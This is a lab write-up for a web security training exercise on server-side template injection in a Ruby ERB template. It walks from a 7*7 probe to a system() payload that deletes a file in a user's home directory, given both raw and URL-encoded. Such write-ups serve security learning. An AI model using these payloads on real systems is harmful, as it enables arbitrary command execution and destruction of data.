Basic server-side template injection
Description
This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.
Reproduction and proof of concept
Notice that when you try to view more details about the first product, a GET request uses the message parameter to render “
Unfortunately this product is out of stock
” on the home page.
GET /?message=Unfortunately%20this%20product%20is%20out%20of%20stock HTTP/1.1
Host: 0a92004e03b924bac214204200eb00bf.web-security-academy.net
...
In the ERB documentation, discover that the syntax
<%= someExpression %>
is used to evaluate an expression and render the result on the page.Use ERB template syntax to create a test payload containing a mathematical operation, for example:
<%= 7*7 %>
URL-encode this payload and insert it as the value of the
message
parameter in the URL:
https://0a92004e03b924bac214204200eb00bf.web-security-academy.net/?message=<%25%3d+7*7+%25>
Load the URL in your browser. Notice that in place of the message, the result of your mathematical operation is rendered on the page, in this case, the number 49. This indicates that we may have a server-side template injection vulnerability.
From the Ruby documentation, discover the
system()
method, which can be used to execute arbitrary operating system commands.Construct a payload to delete Carlos’s file:
<%= system("rm /home/carlos/morale.txt") %>
URL-encode the payload and insert it as the value of the message parameter:
https://0a92004e03b924bac214204200eb00bf.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
Exploitability
An attacker will need to review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt
file from Carlos’s home directory.